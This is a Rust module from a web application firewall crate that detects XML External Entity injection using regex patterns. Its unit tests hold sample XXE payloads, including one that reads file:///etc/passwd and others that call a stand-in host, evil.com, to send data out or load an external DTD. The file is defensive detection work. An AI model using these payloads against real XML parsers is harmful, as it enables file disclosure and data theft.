bext-waf 0.2.0

Web Application Firewall for bext — rate limiting, IP filtering, GeoIP, rule engine
Documentation
//! XML External Entity (XXE) injection detection.
//!
//! Detects `<!DOCTYPE` with `ENTITY` and `SYSTEM`/`PUBLIC` declarations
//! that can be used to read files, perform SSRF, or cause DoS (billion
//! laughs) via XML parsing.

use std::sync::OnceLock;

use regex::RegexSet;

static XXE_PATTERNS: OnceLock<RegexSet> = OnceLock::new();

static XXE_DESCRIPTIONS: &[&str] = &[
    "XXE: DOCTYPE with ENTITY declaration",
    "XXE: SYSTEM keyword in entity",
    "XXE: ENTITY with file:// or http:// URI",
    "XXE: Parameter entity (% entity)",
    "XML billion laughs / entity expansion DoS",
    "XXE: PUBLIC keyword in entity",
];

fn patterns() -> &'static RegexSet {
    XXE_PATTERNS.get_or_init(|| {
        RegexSet::new([
            // 0: DOCTYPE with ENTITY
            r"(?i)<!DOCTYPE\s+[^>]*\bENTITY\b",
            // 1: SYSTEM keyword
            r"(?i)<!ENTITY\s+[^>]*\bSYSTEM\b",
            // 2: Entity with URI
            r#"(?i)<!ENTITY\s+[^>]*(file://|https?://|ftp://|php://|expect://)"#,
            // 3: Parameter entity
            r"(?i)<!ENTITY\s+%\s+\w+",
            // 4: Billion laughs / entity expansion
            r#"(?i)<!ENTITY\s+\w+\s+['"](&\w+;){2,}"#,
            // 5: PUBLIC keyword
            r"(?i)<!ENTITY\s+[^>]*\bPUBLIC\b",
        ])
        .expect("XXE regex patterns must compile")
    })
}

/// Check an input string for XXE injection patterns.
pub fn check_xxe(input: &str) -> Option<String> {
    let set = patterns();
    let matches: Vec<_> = set.matches(input).into_iter().collect();
    if matches.is_empty() {
        None
    } else {
        let idx = matches[0];
        Some(
            XXE_DESCRIPTIONS
                .get(idx)
                .unwrap_or(&"XXE injection")
                .to_string(),
        )
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn detects_basic_xxe() {
        let payload =
            r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_http_xxe() {
        let payload = r#"<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/steal">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_parameter_entity() {
        let payload = r#"<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/evil.dtd">%xxe;]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn detects_billion_laughs() {
        let payload = r#"<!DOCTYPE lol [<!ENTITY lol1 "&lol;&lol;&lol;">]>"#;
        assert!(check_xxe(payload).is_some());
    }

    #[test]
    fn allows_normal_xml() {
        assert!(check_xxe("<root><item>hello</item></root>").is_none());
        assert!(check_xxe(r#"<?xml version="1.0"?><data/>"#).is_none());
    }

    #[test]
    fn allows_normal_text() {
        assert!(check_xxe("This is a normal comment").is_none());
    }
}